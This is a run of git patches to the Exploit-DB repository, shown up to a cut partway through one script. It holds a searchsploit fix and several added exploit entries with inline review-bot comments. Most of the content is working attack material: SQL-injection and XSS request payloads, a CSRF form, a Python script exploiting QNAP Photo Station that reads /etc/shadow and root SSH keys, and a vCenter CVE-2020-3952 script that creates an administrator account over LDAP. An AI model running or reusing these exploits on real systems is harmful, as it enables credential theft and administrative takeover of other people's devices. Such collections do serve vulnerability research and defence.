From a24770728dcdc8828f897efdde542c26e0e65c6b Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Thu, 28 May 2020 12:14:47 +0100 Subject: [PATCH 01/17] Fix for EDBID: 47041 --- searchsploit | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/searchsploit b/searchsploit index 0d3d55d0e..a9ef50a53 100755 --- a/searchsploit +++ b/searchsploit @@ -1,6 +1,6 @@ #!/usr/bin/env bash # Name: SearchSploit - Exploit-DB's CLI search tool -# Version: 4.1.1 (2020-05-01) +# Version: 4.1.2 (2020-05-28) # Written by: Offensive Security, Unix-Ninja, and g0tmi1k # Homepage: https://github.com/offensive-security/exploitdb # Manual: https://www.exploit-db.com/searchsploit @@ -383,7 +383,7 @@ function nmapxml() { ## Read in XMP (IP, name, service and version) xmllint --xpath '//address/@addr|//service/@name|//service/@product|//service/@version' "${FILE}" \ - | sed -e $'s/addr=/\\\n[IP] /g; s/name=/\\\n[NAME] /g; s/product=/\\\n[PRODUCT] /g;s/" version="/\\\n[VERSION] /g; s/"//g' \ + | sed -e $'s/addr=/\\\n[IP] /g; s/name=/\\\n[NAME] /g; s/product=/\\\n[PRODUCT] /g;s/" version="/\\\n[VERSION] /g; s/"//g' \ | grep -v '\[IP\].*\:' \ | while read line; do type=$( echo "${line}" | cut -d" " -f 1 ) @@ -566,7 +566,7 @@ function findresults() { done < <( echo "${TITLE}" \ | grep ${REGEX_GREP} -o "((\d+)(\.?\d*)(\.?\d*)((\.|\-)?(\d|x)*)(\s*))?((<|>)=?)(\s*)(\d+)(\.?\d*)(\.?\d*)((\.|\-)?(\d|x)*)" \ - | sed 's_=__; s_>_<_' + | sed 's_=__; s_>_<_' ) ## Do the same search (just without the version) & loop around all the exploit titles (as thats where the versions are) ## Two main "parts" @@ -597,7 +597,7 @@ function findresults() { fi - ## Magic search Fu + strip double quotes + ## Magic search Fu + strip double quotes + Fix any escaping `\` (need todo it again for JSON only later: issues/#173) OUTPUT="$( ( \ eval ${SEARCH}; \ @@ -607,6 +607,7 @@ function findresults() { | sort -u )" + ## If there are no results, no point going on [[ -z "$OUTPUT" ]] \ && return 
@@ -616,14 +617,17 @@ function findresults() { ## Web link format ("--json --www")? if [[ "${WEBLINK}" -eq 1 ]]; then OUTPUT="$( echo "${OUTPUT}" \ + | sed 's_\\_\\\\_g' \ | awk -F ',' '{ printf "\\n\\t\\t'{'\"Title\":\"%s\",\"URL\":\"https://www.exploit-db.com/'${url}'/%s\"},", $3, $1 }' )" ## Just the EDB-ID ("--json --id")? elif [[ "${EDBID}" -eq 1 ]]; then OUTPUT="$( echo "${OUTPUT}" \ + | sed 's_\\_\\\\_g' \ | awk -F ',' '{ printf "\\n\\t\\t'{'\"Title\":\"%s\",\"EDB-ID\":\"%s\",\"Path\":\"'${path_in}/'%s\"},", $3, $1, $2 }' )" ## Default JSON ("--json")? else OUTPUT="$( echo "${OUTPUT}" \ + | sed 's_\\_\\\\_g' \ | awk -F ',' '{ printf "\\n\\t\\t'{'\"Title\":\"%s\",\"EDB-ID\":\"%s\",\"Date\":\"%s\",\"Author\":\"%s\",\"Type\":\"%s\",\"Platform\":\"%s\",\"Path\":\"'${path_in}/'%s\"},", $3, $1, $4, $5, $6, $7, $2 }' )" fi OUTPUT="$( echo -e ${OUTPUT} \ @@ -642,7 +646,7 @@ function findresults() { ## Default view else OUTPUT="$( echo "${OUTPUT}" \ - | sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \ + | sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \ | awk -F ',' '{ printf "%-'${FORMAT_COL1}'s | %.'${FORMAT_COL2}'s\n", $3, $2 }' \ | sort -f )" fi From 99dc6c7c338e8d1ce29f08b0cd8dcdb783fdb543 Mon Sep 17 00:00:00 2001 
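Review bot: The added `sed 's_\\_\\\\_g'` stage is repeated verbatim in all three JSON branches (`--json --www`, `--json --id` and the default), so any later change to the escaping has to be made in three places. It could run once before the `if [[ "${WEBLINK}" -eq 1 ]]` test, e.g. `OUTPUT="$( echo "${OUTPUT}" | sed 's_\\_\\\\_g' )"`, leaving each branch with only its `awk`. The step covers backslashes only; the titles presumably come straight from the exploit CSV, so any other character that is not valid inside a JSON string (a tab or another control character, for instance) would still reach the `awk` `printf` unescaped. A short comment stating what this step does and does not escape would help consumers that parse the `--json` output. `findresults` starts and ends outside this hunk.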
From: Offensive Security Date: Fri, 29 May 2020 05:02:05 +0000 Subject: [PATCH 02/17] DB: 2020-05-29 4 changes to exploits/shellcodes NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection Online-Exam-System 2015 - 'fid' SQL Injection EyouCMS 1.4.6 - Persistent Cross-Site Scripting QNAP QTS and Photo Station 6.0.3 - Remote Command Execution --- exploits/multiple/webapps/48528.txt | 31 +++++++++ exploits/php/webapps/48529.txt | 22 ++++++ exploits/php/webapps/48530.txt | 30 ++++++++ exploits/php/webapps/48531.py | 103 ++++++++++++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 190 insertions(+) create mode 100644 exploits/multiple/webapps/48528.txt create mode 100644 exploits/php/webapps/48529.txt create mode 100644 exploits/php/webapps/48530.txt create mode 100755 exploits/php/webapps/48531.py diff --git a/exploits/multiple/webapps/48528.txt b/exploits/multiple/webapps/48528.txt new file mode 100644 index 000000000..090d8ca73 --- /dev/null +++ b/exploits/multiple/webapps/48528.txt @@ -0,0 +1,31 @@ +# Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection +# Exploit Author: Berk Dusunur +# Google Dork: N/A +# Type: Web App +# Date: 2020-05-28 +# Vendor Homepage: https://www.nokia.com +# Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/ +# Affected Version: v2020 +# Tested on: MacosX +# CVE : N/A + + +# PoC + + +POST /cgi-bin/vsloginadmin.exe HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Accept: / +Accept-Encoding: gzip,deflate +Content-Length: 84 +Host: berklocal +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, +like Gecko) Chrome/41.0.2228.0 Safari/537.21 + +Password=test&Submit=%20Login%20&UserName=SQL-INJECTION&mode=1 + +Example Time-Based payload + +UserName=test'; waitfor delay '00:00:10' -- \ No newline at end of file 
diff --git a/exploits/php/webapps/48529.txt b/exploits/php/webapps/48529.txt new file mode 100644 index 000000000..edc18ebc4 --- /dev/null +++ b/exploits/php/webapps/48529.txt @@ -0,0 +1,22 @@ +# Exploit Title: Online-Exam-System 2015 - 'fid' SQL Injection +# Exploit Author: Berk Dusunur +# Google Dork: N/A +# Type: Web App +# Date: 2020-05-28 +# Vendor Homepage: https://github.com/sunnygkp10/ +# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git +# Affected Version: 2015 +# Tested on: MacosX +# CVE : N/A + +# PoC + +Affected code + +'; +$id=@$_GET['fid']; +$result = mysqli_query($con,"SELECT * FROM feedback WHERE id='$id' ") or +die('Error'); + +http://berklocal/dash.php?fid=SQL-INJECTION \ No newline at end of file diff --git a/exploits/php/webapps/48530.txt b/exploits/php/webapps/48530.txt new file mode 100644 index 000000000..7a139b6ae --- /dev/null +++ b/exploits/php/webapps/48530.txt 
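Review bot: The "Affected code" excerpt in 48529.txt shows `$_GET['fid']` placed directly into the `SELECT * FROM feedback WHERE id='$id'` string, but the entry stops at the PoC URL and gives no remediation. A closing line for people who run or maintain the application would make the entry more useful, for example `# Fix: bind fid as a parameter (mysqli_prepare with "WHERE id=?") instead of interpolating it into the query`. The excerpt also opens with a stray `';`, which looks like the tail of a truncated line and should be completed or trimmed.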
@@ -0,0 +1,30 @@ +# Exploit Title: EyouCMS 1.4.6 - Persistent Cross-Site Scripting +# Date: 2020-05-28 +# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. +# Vendor Homepage: https://eyoucms.com +# Software Link: https://qiniu.eyoucms.com/EyouCMS-V1.4.6-UTF8-SP2.zip +# Version: EyouCMS V1.4.6 +# Tested on: Windows +# CVE : N/A + +Vulnerable Request: +POST /EyouCMS/index.php?m=user&c=UsersRelease&a=article_add HTTP/1.1 +Host: 192.168.31.244 +Content-Length: 131 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://192.168.31.244 +Referer: http://192.168.31.244/EyouCMS/index.php?m=user&c=UsersRelease&a=article_add +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: users_id=4; home_lang=cn; admin_lang=cn; PHPSESSID=mahba3d6smn8d400pedi9n9gl0; referurl=http%3A%2F%2F192.168.31.244%2FEyouCMS%2Findex.php +Connection: close + +title=test&typeid=9&tags=&litpic_inpiut=&addonFieldExt%5Bcontent%5D=111&__token__=b90d4bf2356b81f65284238857b91ada + + + +王新峰 技术管理部 +中国银行保险信息技术管理有限公司 \ No newline at end of file diff --git a/exploits/php/webapps/48531.py b/exploits/php/webapps/48531.py new file mode 100755 index 000000000..f1bb85f4b --- /dev/null +++ b/exploits/php/webapps/48531.py 
@@ -0,0 +1,103 @@ +# Exploit Title: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution +# Exploit Author: Yunus YILDIRIM (Th3Gundy) +# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com +# Date: 2020-05-28 +# Vendor Homepage: https://www.qnap.com +# Version: QTS < 4.4.1 | Photo Station < 6.0.3 +# CVE: CVE-2019-7192, CVE-2019-7193, CVE-2019-7194, CVE-2019-7195 +# References: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit +# References: https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e +# References: https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 + +###################################################################### +###################################################################### + +#!/usr/bin/python3 + +__author__ = "Yunus YILDIRIM (@Th3Gundy)" +__version__ = "0.1" + + +import requests +import re, sys + +# hide ssl error +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +def get_banner(): + print("""\033[91m + █████ ███▄ █ ▄▄▄ ██▓███ +▒██▓ ██▒ ██ ▀█ █ ▒████▄ ▓██░ ██▒ +▒██▒ ██░▓██ ▀█ ██▒▒██ ▀█▄ ▓██░ ██▓▒ +░██ █▀ ░▓██▒ ▐▌██▒░██▄▄▄▄██ ▒██▄█▓▒ ▒ +░▒███▒█▄ ▒██░ ▓██░ ▓█ ▓██▒▒██▒ ░ ░ +░░ ▒▒░ ▒ ░ ▒░ ▒ ▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ + ░ ▒░ ░ ░ ░░ ░ ▒░ ▒ ▒▒ ░░▒ ░ + ░ ░ ░ ░ ░ ░ ▒ ░░ + ░ ░ ░ ░ \033[0m \033[94m {0} \033[0m + """.format(__author__)) + + +def get_file_content(file): + post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file} + file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10) + + print("="*65) ; print("{0} file content;\n{1}" .format(file,file_read_response.text)) + +# print banner +get_banner() + +if len(sys.argv) != 2: + print("\033[93mUsage : python3 gundy.py https://vulnerable_url:port\033[0m") + sys.exit(-1) + +url = sys.argv[1].rstrip('/') +headers = {"User-Agent": 
"Gundy - QNAP RCE"} + +# for session cookie +req = requests.Session() + +####################################################################### +# search album_id + +print("="*65) +post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'} +album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10) + +if album_id_response.status_code != 200: + print("album id not found \n\033[91mnot vulnerable\033[0m") + sys.exit(0) + +album_id = re.search('(?<=).*?(?=)', album_id_response.text).group() + +print("album_id ==> " + album_id) + +####################################################################### +# search $_SESSION['access_code'] + +access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10) +if access_code_response.status_code != 200: + print("slideshow not found \n\033[91mnot vulnerable\033[0m") + sys.exit(0) + +access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group() + +print("access_code ==> " + access_code) + +####################################################################### + +# /etc/passwd file read +get_file_content('./../../../../../etc/passwd') + +# /etc/shadow read +get_file_content('./../../../../../etc/shadow') + +# /etc/hostname read +get_file_content('./../../../../../etc/hostname') + +# /root/.ssh/id_rsa read +get_file_content('./../../../../../root/.ssh/id_rsa') + +####################################################################### \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 98beb6865..2b9530404 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -42755,3 +42755,7 @@ id,file,description,date,author,type,platform,port 48525,exploits/php/webapps/48525.txt,"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting",2020-05-27,"Matthew Aberegg",webapps,php, 48526,exploits/php/webapps/48526.txt,"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting",2020-05-27,"China Banking and Insurance Information Technology Management Co.",webapps,php, 48527,exploits/php/webapps/48527.txt,"OXID eShop 6.3.4 - 'sorting' SQL Injection",2020-05-27,VulnSpy,webapps,php, +48528,exploits/multiple/webapps/48528.txt,"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection",2020-05-28,"Berk Dusunur",webapps,multiple, +48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php, +48530,exploits/php/webapps/48530.txt,"EyouCMS 1.4.6 - Persistent Cross-Site Scripting",2020-05-28,"China Banking and Insurance Information Technology Management Co.",webapps,php, +48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php, From 326e1cc9df21af6ce7c9a470f6d33fae7e56b0dc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 30 May 2020 05:01:57 +0000 Subject: [PATCH 03/17] DB: 2020-05-30 2 changes to exploits/shellcodes WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User) Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass --- exploits/multiple/webapps/48533.py | 81 ++++++++++++++++++++++++++++++ exploits/php/webapps/48532.txt | 23 +++++++++ files_exploits.csv | 2 + 3 files changed, 106 insertions(+) create mode 100755 exploits/multiple/webapps/48533.py create mode 100644 exploits/php/webapps/48532.txt diff --git a/exploits/multiple/webapps/48533.py b/exploits/multiple/webapps/48533.py new file mode 100755 index 000000000..acee1f0c8 --- /dev/null +++ b/exploits/multiple/webapps/48533.py 
@@ -0,0 +1,81 @@ +# Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass +# Exploit Author : Halis Duraki (@0xduraki) +# Date : 2020-05-28 +# Product : http-protection (Crystal Shard) +# Product URI : https://github.com/rogeriozambon/http-protection +# Version : http-protection <= 0.2.0 +# CVE : N/A + +## About the product + +This library/shard (http-protection) protects against typical web attacks with-in Crystal applications. It was inspired by rack-protection Ruby gem. It is an open-source product developed by Rogério Zambon in Brazil. The total number of installs and respective usage is not known (no available information), but the Shard get the traction on Crystal official channels (Crystals' ANN, Gitter, and Shardbox). + +## About the exploit + +The `IpSpoofing` middleware detects spoofing attacks (and likewise, should prevent it). Both of this functionalities can be bypassed by enumerating and hardcoding `X-*` header values. The middleware works by detecting difference between IP addr values of `X-Forwarded-For` & `X-Real-IP/X-Client-IP`. If the values mismatch, the middleware protects the application by forcing `403 (Forbidden)` response. + +Relevant code (src/http-protection/ip_spoofing.cr): + +``` +module HTTP::Protection +class IpSpoofing +... + +def call(... ctx) +... +ips = headers["X-Forwarded-For"].split(/\s*,\s*/) + +return forbidden(context) if headers.has_key?("X-Client-IP") && !ips.includes?(headers["X-Client-IP"]) +return forbidden(context) if headers.has_key?("X-Real-IP") && !ips.includes?(headers["X-Real-IP"]) +... +end +end +end +``` + +The exploit works by hardcoding the values in all protection request headers following the same const IP Address. The standard format for `X-Forwarded-For` from MDN reference those values as: `X-Forwarded-For: , , `. HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls. 
+ +@see CWE-16: https://cwe.mitre.org/data/definitions/16.html + +## PoC (Proof of Concept) + +* Set a breakpoint on the request, or intercept request. +* Hardcore all three request headers: +* X-Forwarded-For: 123.123.123.123 +* X-Client-IP: 123.123.123.123 +* X-Real-IP: 123.123.123.123 +* Continue request. +* Response should be 200 OK, otherwise, 400 Forbidden. + +++ Request example (POC): + +``` +GET / HTTP/1.1 +Host: localhost.:8081 +X-Forwarded-For: 123.123.123.123 +X-Client-IP: 123.123.123.123 +X-Real-IP: 123.123.123.123 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Pragma: no-cache +Cache-Control: no-cache +``` + +++ Response (POC): + +``` +200 OK +```` + +## Fix + +It is advised to fix the IpSpoofing detection via checking socket data directly instead of relying on passed header key/vals. The other solution is to force proxy to dismiss such data (on request) and use original source (proxified). + +============================================================================================================== ++ Halis Duraki | duraki@linuxmail.org | @0xduraki | https://duraki.github.io +============================================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/48532.txt b/exploits/php/webapps/48532.txt new file mode 100644 index 000000000..2bb4035f1 --- /dev/null +++ b/exploits/php/webapps/48532.txt 
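Review bot: The PoC steps end with "Response should be 200 OK, otherwise, 400 Forbidden", while the description above says the middleware answers `403 (Forbidden)`; the step should read `403 Forbidden`. The file is added as `48533.py` with mode 100755, but its body is Markdown prose with no Python in it, so a `.txt` or `.md` name without the executable bit would match the content (the `files_exploits.csv` row would change with it). Two smaller wording points: "Hardcore all three request headers" should be "Hardcode", and the fence after `200 OK` closes with four backticks against three at its opening. The Fix section, which advises taking the client address from the socket or from a proxy that discards these headers, is what a defender needs and would be easier to find nearer the top of the entry.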
@@ -0,0 +1,23 @@ +# Exploit Title: WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User) +# Google Dork: N/A +# Date: 2020-05-21 +# Exploit Author: UnD3sc0n0c1d0 +# Vendor Homepage: https://www.bdtask.com/ +# Software Link: https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip +# Category: Web Application +# Version: 1.0.0 +# Tested on: CentOS 7 / WordPress 5.4.1 +# CVE : N/A + +# 1. Technical Description: +The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability +in the forms it presents, allowing the possibility of deleting records (users) when an ID is known. + +# 2. Proof of Concept (PoC): + +
+
+ + +
+ \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2b9530404..f0b4b6136 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42759,3 +42759,5 @@ id,file,description,date,author,type,platform,port 48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php, 48530,exploits/php/webapps/48530.txt,"EyouCMS 1.4.6 - Persistent Cross-Site Scripting",2020-05-28,"China Banking and Insurance Information Technology Management Co.",webapps,php, 48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php, +48532,exploits/php/webapps/48532.txt,"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)",2020-05-29,UnD3sc0n0c1d0,webapps,php, +48533,exploits/multiple/webapps/48533.py,"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass",2020-05-29,"Halis Duraki",webapps,multiple, From b68cd4f38a9dbf2fb16c4398150a0503521fa697 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 2 Jun 2020 05:01:56 +0000 Subject: [PATCH 04/17] DB: 2020-06-02 3 changes to exploits/shellcodes Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation VMware vCenter Server 6.7 - Authentication Bypass QuickBox Pro 2.1.8 - Authenticated Remote Code Execution --- exploits/multiple/webapps/48535.txt | 248 ++++++++++++++++++++++++++++ exploits/php/webapps/48534.py | 58 +++++++ exploits/php/webapps/48536.py | 53 ++++++ files_exploits.csv | 3 + 4 files changed, 362 insertions(+) create mode 100644 exploits/multiple/webapps/48535.txt create mode 100755 exploits/php/webapps/48534.py create mode 100755 exploits/php/webapps/48536.py diff --git a/exploits/multiple/webapps/48535.txt b/exploits/multiple/webapps/48535.txt new file mode 100644 index 000000000..b15ea1f20 --- /dev/null +++ b/exploits/multiple/webapps/48535.txt 
@@ -0,0 +1,248 @@ +# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass +# Date: 2020-06-01 +# Exploit Author: Photubias +# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html +# Version: vCenter Server 6.7 before update 3f +# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) +# CVE: CVE-2020-3952 + +#!/usr/bin/env python3 + +''' + Copyright 2020 Photubias(c) + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 + + File name CVE-2020-3592.py + written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be + + ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x + + This is a native implementation without requirements, written in Python 3. 
+ Works equally well on Windows as Linux (as MacOS, probably ;-) + + Features: exploit + vulnerability checker +''' + +import binascii, socket, sys, string, random + +## Default vars; change at will +_sIP = '192.168.50.35' +_iPORT = 389 +_iTIMEOUT = 5 + +def randomString(iStringLength=8): + #sLetters = string.ascii_lowercase + sLetters = string.ascii_letters + return ''.join(random.choice(sLetters) for i in range(iStringLength)) + +def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified + ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed + sReturn = sPrefix + if (len(sData) / 2 ) > 255: + sReturn += b'82' + hexBytes = 2 + elif (len(sData) /2 ) >= 128: + sReturn += b'81' + sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() + return sReturn + +def buildBindRequestPacket(sUser, sPass): + sUser = binascii.hexlify(sUser.encode()) + sPass = binascii.hexlify(sPass.encode()) + ## Packet Construction + sPacket = getLengthPrefix(sPass, b'80') + sPass + sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket + sPacket = b'020103' + sPacket + sPacket = getLengthPrefix(sPacket, b'60') + sPacket + sPacket = b'020101' + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def buildUserCreatePacket(sUser, sPass): + sUser = binascii.hexlify(sUser.encode()) + sPass = binascii.hexlify(sPass.encode()) + def createAttribute(sName, sValue): + sValue = getLengthPrefix(sValue, b'04') + sValue + sName = getLengthPrefix(sName, b'04') + sName + + sReturn = getLengthPrefix(sValue, b'31') + sValue + sReturn = sName + sReturn + sReturn = getLengthPrefix(sReturn, b'30') + sReturn + return sReturn + + def createObjectClass(): + sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') + sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') + sReturn += 
getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') + sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') + + sReturn = getLengthPrefix(sReturn, b'31') + sReturn + sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn + sReturn = getLengthPrefix(sReturn, b'30') + sReturn + return sReturn + + ## Attributes + sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) + sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) + sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) + sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) + sAttributes += createObjectClass() + sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) + ## CN + sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') + sUserEntry = getLengthPrefix(sCN, b'04') + sCN + + ## Packet Assembly (bottom up) + sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes + sPacket = sUserEntry + sPacket + sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def buildModifyUserPacket(sUser): + sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) + sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') + sMember = binascii.hexlify(b'member') + ## Packet Construction + sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN + sPacket = getLengthPrefix(sPacket, b'31') + sPacket + 
sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket + sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket + sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def performBind(s): + ## Trying to bind, fails, but necessary (even fails when using correct credentials) + dPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be') + s.send(dPacket) + sResponse = s.recv(1024) + try: + sResponse = sResponse.split(b'\x04\x00')[0][-1:] + sCode = binascii.hexlify(sResponse).decode() + if sCode == '31': print('[+] Ok, service reachable, continuing') + else: print('[-] Something went wrong') + except: + pass + return sCode + +def performUserAdd(s, sUser, sPass): + dPacket = buildUserCreatePacket(sUser,sPass) + s.send(dPacket) + sResponse = s.recv(1024) + try: + sCode = sResponse.split(b'\x04\x00')[0][-1:] + sMessage = sResponse.split(b'\x04\x00')[1] + if sCode == b'\x00': + print('[+] Success! 
User ' + sUser + '@vsphere.local added with password ' + sPass) + elif sCode == b'\x32': + print('[-] Error, this host is not vulnerable (insufficientAccessRights)') + else: + if sMessage[2] == b'81': sMessage = sMessage[3:].decode() + else: sMessage = sMessage[2:].decode() + print('[-] Error, user not added, message received: ' + sMessage) + except: + pass + return sCode + + +def performUserMod(s, sUser, verbose = True): + dPacket = buildModifyUserPacket(sUser) + s.send(dPacket) + sResponse = s.recv(1024) + try: + sCode = sResponse.split(b'\x04\x00')[0][-1:] + sMessage = sResponse.split(b'\x04\x00')[1] + if sCode == b'\x00': + if verbose: print('[+] User modification success (if the above is OK).') + else: + if sMessage[2] == b'81': sMessage = sMessage[3:].decode() + else: sMessage = sMessage[2:].decode() + if verbose: print('[-] Error during modification, message received: ' + sMessage) + except: + pass + return sCode, sMessage + +def performUnbind(s): + try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') + except: pass + +def main(): + global _sIP, _iPORT, _iTIMEOUT + _sUSER = 'user_' + randomString(6) + _sPASS = randomString(8) + '_2020' + bAdduser = False + if len(sys.argv) == 1: + print('[!] No arguments found: python3 CVE-2020-3592.py [] []') + print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) + print(' Leave username & password empty for a vulnerability check') + print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') + print(' But for now, I will ask questions') + sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') + if not sAnswer == '': _sIP = sAnswer + sAnswer = input('[?] Want to perform a check only? [Y/n]: ') + if sAnswer.lower() == 'n': bAdduser = True + if bAdduser: + sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') + if not sAnswer == '': _sUSER = sAnswer + sAnswer = input('[?] 
